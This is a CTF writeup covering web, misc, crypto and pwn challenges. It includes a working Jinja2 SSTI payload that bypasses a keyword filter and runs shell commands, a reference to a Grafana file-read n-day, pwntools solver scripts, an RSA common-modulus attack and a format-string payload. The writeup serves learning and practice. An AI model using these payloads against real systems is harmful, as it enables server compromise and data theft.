[NUAACTF] WriteUp by team 壞女人讓我嘗盡愛情的苦


Sign-in

Sign-in

flag{we1c0m_t0_asur!ctf}

Web

baby_python

A simple SSTI with a string-concatenation bypass: the filtered keywords are split and joined with +, which gets past the check:

name={% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__ == 'catch_warnings' %}{% for b in c.__init__.__globals__.values() %}{% if b.__class__ == {}.__class__ %}{% if 'ev'+'al' in b.keys() %}{{ b['ev'+'al']('__import__("o"+"s").popen("cat flllll11111114aaaaaggggggggggggg").read()') }}{% endif %}{% endif %}{% endfor %}{% endif %}{% endfor %}

[image]

Real sign-in

This is an n-day that appeared recently; a Baidu search turns up the details of the Grafana 8.x arbitrary file read vulnerability.

[image]

Twister

In the JS there is a comment plus a chunk of obfuscated code; just drop the obfuscated code into the browser console and run it:

[image]

[image]

Then look at the Cookie to get the flag:

[image]

Misc

baby_mix

Opening the archive asks for a password; a look in WinHex shows it is only pseudo-encrypted.

Change 09 00 to 00 00 and it opens normally.

[image]
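A small audit script for the pseudo-encryption trick above, added here and not part of the original writeup: it builds a constructed archive in memory, sets the "encrypted" bit (bit 0 of the general-purpose flag, the 09 00 field edited in WinHex) only in the central directory to reproduce the symptom, and then reports entries whose local and central headers disagree. Function and file names are assumptions of this example.

```python
import io
import struct
import zipfile

def build_sample_zip() -> bytes:
    # Constructed sample: an ordinary, unencrypted archive built in memory.
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("flag.png", b"\x89PNG\r\n\x1a\n" + b"constructed image bytes")
    return buf.getvalue()

def central_entries(data: bytes):
    """Yield the offset of every central-directory header, found through the
    end-of-central-directory record instead of scanning for 'PK\\x01\\x02'."""
    eocd = data.rfind(b"PK\x05\x06")
    if eocd == -1:
        raise ValueError("no end-of-central-directory record")
    count, = struct.unpack_from("<H", data, eocd + 10)
    pos, = struct.unpack_from("<I", data, eocd + 16)
    for _ in range(count):
        if data[pos:pos + 4] != b"PK\x01\x02":
            raise ValueError("corrupt central directory")
        name_len, extra_len, comment_len = struct.unpack_from("<HHH", data, pos + 28)
        yield pos
        pos += 46 + name_len + extra_len + comment_len

def audit_encrypt_flags(data: bytes) -> list:
    """Return (name, local_bit0, central_bit0) per entry. A 1 only in the central
    column is the tell-tale of pseudo-encryption: extractors trust the central
    directory and prompt for a password although the local header is clean."""
    report = []
    for pos in central_entries(data):
        cflag, = struct.unpack_from("<H", data, pos + 8)
        name_len, = struct.unpack_from("<H", data, pos + 28)
        local_off, = struct.unpack_from("<I", data, pos + 42)
        name = data[pos + 46:pos + 46 + name_len].decode("utf-8", "replace")
        lflag, = struct.unpack_from("<H", data, local_off + 6)
        report.append((name, lflag & 1, cflag & 1))
    return report

def set_central_encrypt_bit(data: bytes, value: int) -> bytes:
    """Set or clear bit 0 (encrypted) of the general-purpose flag in each
    central-directory header: the 09 00 -> 00 00 edit from the writeup, or,
    with value=1, the reverse edit that fakes encryption on the sample."""
    out = bytearray(data)
    for pos in central_entries(data):
        flag, = struct.unpack_from("<H", out, pos + 8)
        struct.pack_into("<H", out, pos + 8, (flag & ~1) | (value & 1))
    return bytes(out)
```

Run `audit_encrypt_flags(set_central_encrypt_bit(build_sample_zip(), 1))` to see the (0, 1) mismatch that a real pseudo-encrypted archive shows.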

Inside the archive is a PNG image.

In the lowest bit of the R channel there is a QR code.

[image]

Scanning it gives:

4a5a4a584732544748424658515654514f4634575135435447564a4749564a5347463455595754564f464c444f5752594f56465751334b55474a345841324b494b4a3546495533594b524a4449524b454b35435753334c324f4a41564153534f48424756515243574d355a464d3543474a593d3d3d3d3d3d

Decoding hex, base32, base58 and base64 in that order gives the flag.

[image]

medium

After the IEND chunk there is a lot of extra data, which is base-encoded.

[image]

Extract all of it:

RjAgOUYgOTkgODMgRjAgOUYgOTIgQjUgRjAgOUYgOEMgQkYgRjAgOUYgOEUgQTQgRjAgOUYgOUEgQUEgRjAgOUYgOEMgOEYgRjAgOUYgOTAgOEUgRjAgOUYgQTUgOEIgRjAgOUYgOUEgQUIgRjAgOUYgOTggODYgRTIgOUMgODUgRjAgOUYgOTggODAgRjAgOUYgQTQgQTMgRTIgOEMgQTggRjAgOUYgOTAgOEQgRTIgOTggODAgRjAgOUYgQTUgOEIgRjAgOUYgOTggODYgRjAgOUYgOTkgODMgRjAgOUYgOEUgODMgRjAgOUYgOTAgOTggRjAgOUYgOEQgOEQgRTIgOTggODIgRjAgOUYgOUEgQUEgRjAgOUYgOEMgQUEgRjAgOUYgOTIgQjUgRjAgOUYgOUEgQTggRTIgOEMgQTggRjAgOUYgOTggODEgRjAgOUYgOTQgQUEgRTIgOUMgOTYgRjAgOUYgOEUgODggRjAgOUYgOEMgOEYgRjAgOUYgOTQgODQgRjAgOUYgOTYgOTAgRjAgOUYgQTYgOTMgRjAgOUYgOEMgOEYgRjAgOUYgOTUgQjkgRjAgOUYgOTggOEQgRjAgOUYgOTEgOEMgRjAgOUYgOEMgODkgRjAgOUYgOTIgQjUgRjAgOUYgOEYgOEUgRjAgOUYgOUEgQUIgRjAgOUYgQTQgQTMgRjAgOUYgOTYgOTAgRjAgOUYgOTIgQTcgRjAgOUYgOEQgOEQgRjAgOUYgOEMgQkYgRjAgOUYgOTggOEQgRjAgOUYgOEQgOEUgRjAgOUYgOUEgQTggRjAgOUYgOTAgOEUgRjAgOUYgOTIgQjUgRjAgOUYgOEMgQkYgRjAgOUYgOEYgQjkgRjAgOUYgOEUgODUgRjAgOUYgOTkgODMgRjAgOUYgOTEgOTEgRjAgOUYgOTggODYgRTIgOTggODMgRjAgOUYgOTAgODUgRjAgOUYgOTUgQjkgRjAgOUYgOTggODcgRjAgOUYgOEYgQjkgRjAgOUYgOEYgQjkgRjAgOUYgOEQgQjUgRjAgOUYgOEUgODggRjAgOUYgOEQgOEUgRjAgOUYgQTQgQTMgRjAgOUYgOTggODEgRjAgOUYgOEQgOEQgRjAgOUYgOUEgQTggRjAgOUYgOEYgQjkgRjAgOUYgOTEgQTMgRjAgOUYgOTQgODQgRjAgOUYgQTQgQTMgRjAgOUYgOEUgODggRjAgOUYgOTggODIgRjAgOUYgOTAgOEQgRTIgOUMgODUgRjAgOUYgOTggODAgIEUyIDlDIDg1IEYwIDlGIDlBIEFBIEYwIDlGIDk4IDhFIEYwIDlGIDk4IDgwIEYwIDlGIDk3IDkyIEYwIDlGIDk3IDkyCg==

base64-decoding gives:

F0 9F 99 83 F0 9F 92 B5 F0 9F 8C BF F0 9F 8E A4 F0 9F 9A AA F0 9F 8C 8F F0 9F 90 8E F0 9F A5 8B F0 9F 9A AB F0 9F 98 86 E2 9C 85 F0 9F 98 80 F0 9F A4 A3 E2 8C A8 F0 9F 90 8D E2 98 80 F0 9F A5 8B F0 9F 98 86 F0 9F 99 83 F0 9F 8E 83 F0 9F 90 98 F0 9F 8D 8D E2 98 82 F0 9F 9A AA F0 9F 8C AA F0 9F 92 B5 F0 9F 9A A8 E2 8C A8 F0 9F 98 81 F0 9F 94 AA E2 9C 96 F0 9F 8E 88 F0 9F 8C 8F F0 9F 94 84 F0 9F 96 90 F0 9F A6 93 F0 9F 8C 8F F0 9F 95 B9 F0 9F 98 8D F0 9F 91 8C F0 9F 8C 89 F0 9F 92 B5 F0 9F 8F 8E F0 9F 9A AB F0 9F A4 A3 F0 9F 96 90 F0 9F 92 A7 F0 9F 8D 8D F0 9F 8C BF F0 9F 98 8D F0 9F 8D 8E F0 9F 9A A8 F0 9F 90 8E F0 9F 92 B5 F0 9F 8C BF F0 9F 8F B9 F0 9F 8E 85 F0 9F 99 83 F0 9F 91 91 F0 9F 98 86 E2 98 83 F0 9F 90 85 F0 9F 95 B9 F0 9F 98 87 F0 9F 8F B9 F0 9F 8F B9 F0 9F 8D B5 F0 9F 8E 88 F0 9F 8D 8E F0 9F A4 A3 F0 9F 98 81 F0 9F 8D 8D F0 9F 9A A8 F0 9F 8F B9 F0 9F 91 A3 F0 9F 94 84 F0 9F A4 A3 F0 9F 8E 88 F0 9F 98 82 F0 9F 90 8D E2 9C 85 F0 9F 98 80  E2 9C 85 F0 9F 9A AA F0 9F 98 8E F0 9F 98 80 F0 9F 97 92 F0 9F 97 92

Hex-decoding that gives:

🙃💵🌿🎤🚪🌏🐎🥋🚫😆✅😀🤣⌨🐍☀🥋😆🙃🎃🐘🍍☂🚪🌪💵🚨⌨😁🔪✖🎈🌏🔄🖐🦓🌏🕹😍👌🌉💵🏎🚫🤣🖐💧🍍🌿😍🍎🚨🐎💵🌿🏹🎅🙃👑😆☃🐅🕹😇🏹🏹🍵🎈🍎🤣😁🍍🚨🏹👣🔄🤣🎈😂🐍✅😀✅🚪😎😀🗒🗒

The challenge description says: do you know AES? Then this one is far too easy for you.
So this is emoji AES encryption; a key is missing, and it must be in key.wav.

Looking at the spectrogram of key.wav gives:

MudaMudaMudaMuda

[image]

https://aghorler.github.io/emoji-aes/#

Finally, run an emoji-AES decryption:

[image]

The final flag:

flag{AES_1s_Gr3atS0_y0u_L1ke_1t_V3ry_Much}

We Live in Nanjing (1): Radio Waves Across Time

Reverse the audio and you can hear Greek letters.

From the challenge description:

They use the method customary in radio to tell apart letters of a string that sound alike.

Map them accordingly and you get the flag:

flag{radiowavesacrosstime}

We Live in Nanjing (2): Continuous-Wave (CW) Telegraphy?

The attachment is an mp3; the "CW" in the challenge description tells us it is Morse code.

[image]

A bit of fuzzing shows the Morse code is in the spectrogram.

[image]

Short pulses are '.', long pulses are '-', which gives:

..-. .-.. .- --. -.-. .-- .. ..... ....- - .-. ....- -.. .. - .. ----- -. -- ...-- - .... ----- -..

Morse-decoding gives the flag:

flag{cwi54tr4diti0nm3th0d}

Re

IDA Start

[image]

Crypto

checkin

oclz{loovyd_vb_l_bvnucd_hqpumj}

//(11x + 11) mod 26

Affine cipher

from Crypto.Util.number import inverse

# Ciphertext of the affine cipher E(x) = (11x + 11) mod 26; decrypt with
# D(y) = 11^-1 * (y - 11) mod 26. Non-letters (braces, underscores) pass through.
a = 'oclz{loovyd_vb_l_bvnucd_hqpumj}'
table = 'abcdefghijklmnopqrstuvwxyz'
flag = ''
for i in a:
    if i in table:
        val = table.index(i)
        val = (val - 11) * inverse(11, 26) % 26
        flag += table[val]
    else:
        flag += i
print(flag)

easyRSA

Reading the files, data1 and data2 are both encryptions of the same m under the same modulus, so this is a common-modulus attack. The padding has to be handled, so a small unpad function is needed.

from Crypto.Util.number import bytes_to_long, long_to_bytes
import gmpy2

with open('flag.enc1', 'rb') as fi1:
    data1 = fi1.read()
with open('flag.enc2', 'rb') as fi2:
    data2 = fi2.read()

def unpad_even(x):
    # Strip the leading '0' byte that the challenge prepends when the data
    # has an odd length; otherwise return the data unchanged.
    if x[:1] == b'0' and len(x) % 2 == 1:
        return x[1:]
    else:
        return x

# print(data2)
data1 = unpad_even(data1)
data2 = unpad_even(data2)
c1 = bytes_to_long(data1)
c2 = bytes_to_long(data2)
N = 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

e1 = 17
e2 = 65537

# Common-modulus attack: gcdext gives x, y with e1*x + e2*y = 1, so
# c1^x * c2^y = m^(e1*x + e2*y) = m (mod N). A negative exponent together
# with a modulus is evaluated through the modular inverse.
g, x, y = gmpy2.gcdext(e1, e2)
print(long_to_bytes(pow(c1, x, N) * pow(c2, y, N) % N))
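A self-contained version of the common-modulus attack the script above performs, using constructed toy primes instead of the challenge's N (an added example, not the writeup's own code): it checks the precondition gcd(e1, e2) == 1, derives the Bezout coefficients, and recovers m. The defensive takeaway is that one modulus must never be shared between two public exponents; the names P, Q, M and demo are assumptions of this example.

```python
from math import gcd

def egcd(a: int, b: int):
    """Extended Euclid: returns (g, x, y) with a*x + b*y == g == gcd(a, b)."""
    x0, x1, y0, y1 = 1, 0, 0, 1
    while b:
        q, a, b = a // b, b, a % b
        x0, x1 = x1, x0 - q * x1
        y0, y1 = y1, y0 - q * y1
    return a, x0, y0

def common_modulus(n: int, e1: int, c1: int, e2: int, c2: int) -> int:
    """Recover m from c1 = m^e1 and c2 = m^e2 (same n). Needs gcd(e1, e2) == 1;
    then e1*x + e2*y == 1 and c1^x * c2^y == m^(e1*x + e2*y) == m (mod n)."""
    if gcd(e1, e2) != 1:
        raise ValueError("public exponents must be coprime")
    _, x, y = egcd(e1, e2)
    # pow() with a negative exponent and a modulus uses the modular inverse
    # (Python >= 3.8), so it does not matter which of x, y is negative.
    return pow(c1, x, n) * pow(c2, y, n) % n

# Constructed toy parameters (tiny primes, NOT the challenge's modulus).
P, Q = 10007, 10009
N = P * Q
E1, E2 = 17, 65537                   # the two exponents from the writeup
M = int.from_bytes(b"ctf", "big")    # constructed message, < N and coprime to N

def demo() -> bytes:
    # Two encryptions of the same message under the same modulus are enough.
    c1 = pow(M, E1, N)
    c2 = pow(M, E2, N)
    m = common_modulus(N, E1, c1, E2, c2)
    return m.to_bytes((m.bit_length() + 7) // 8, "big")
```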

Guessgame

This challenge is curious: if you only ever send 1, the lowest bit position of its number that is 1 gets flipped to 0.

But there are only 50 attempts, so we keep sending 1 and use the last 7 attempts to send 0; once num has become 0 we can score.

from pwn import *
context.log_level = 'debug'
io = remote("ctf.asuri.club", 10000)
# Each '1' clears the lowest set bit of the number; 43 of them plus the
# 7 zeros below use up the 50 attempts.
for i in range(43):
    io.recv()
    io.sendline(b'1')
# Once num is 0, send '0' for the remaining attempts to score.
for i in range(7):
    io.recv()
    io.sendline(b'0')
io.interactive()

Numbers

Here ax - by = 1 with a and b known. The first thing that comes to mind is the extended Euclidean algorithm, but from the third level onward that runs into a problem:

ax - by = a fairly large number.

So this is where the continued-fraction method comes in.

A script found online does the job:

from pwn import *

def CCFF(x, y):
    # Continued-fraction expansion of x/y: the list of partial quotients.
    cF = []
    while y:
        cF += [x // y]
        x, y = y, x % y
    return cF

def CONVER(ctnf):
    # Fold a partial-quotient list back into a fraction; returns
    # (numerator, denominator) of the reciprocal of that convergent.
    numerator = 0
    denominator = 1
    for x in ctnf[::-1]:
        numerator, denominator = denominator, x * denominator + numerator
    return (numerator, denominator)

def MY_XY(c):
    # All convergents of the expansion c, one per proper prefix.
    cf = []
    for i in range(1, len(c)):
        cf.append(CONVER(c[:i]))
    return cf

def attack(a, b, val):
    # Expand a/b, rewrite the expansion to even length without changing its
    # value, then look for the convergent (x, y) with a*x - b*y == val.
    cf = CCFF(a, b)
    if len(cf) & 1:
        cf = cf[:-1] + [cf[-1] - 1, 1]
    for x, y in MY_XY(cf):
        if a * x - b * y == val:
            return x, y

def recs():
    # Parse one level of the form "a*x-b*y=val", solve it and send x, y.
    io.recvuntil(b'Level ')
    io.recvline()
    a = int(io.recvuntil(b'*')[:-1])
    io.recvuntil(b'x-')
    b = int(io.recvuntil(b'*')[:-1])
    io.recvuntil(b'=')
    val = int(io.recvline().strip())
    print(val)
    x, y = attack(a, b, val)
    io.recv()
    io.sendline(str(x).encode())
    io.sendline(str(y).encode())

# context.log_level = 'debug'
io = None
while 1:
    try:
        io = remote("ctf.asuri.club", 10001)
        for i in range(5):
            recs()
        io.interactive()
    except Exception:
        # No convergent matched or the connection broke: reconnect and retry.
        if io:
            io.close()
        continue
# flag{C0ntInu3d_fR4cTioNs_4r3_1nter3stinG}

Pwn

format

Format string vulnerability: a pointer to the flag sits on the stack, so %s prints it directly; the offset is 7, so the payload is %7$s.

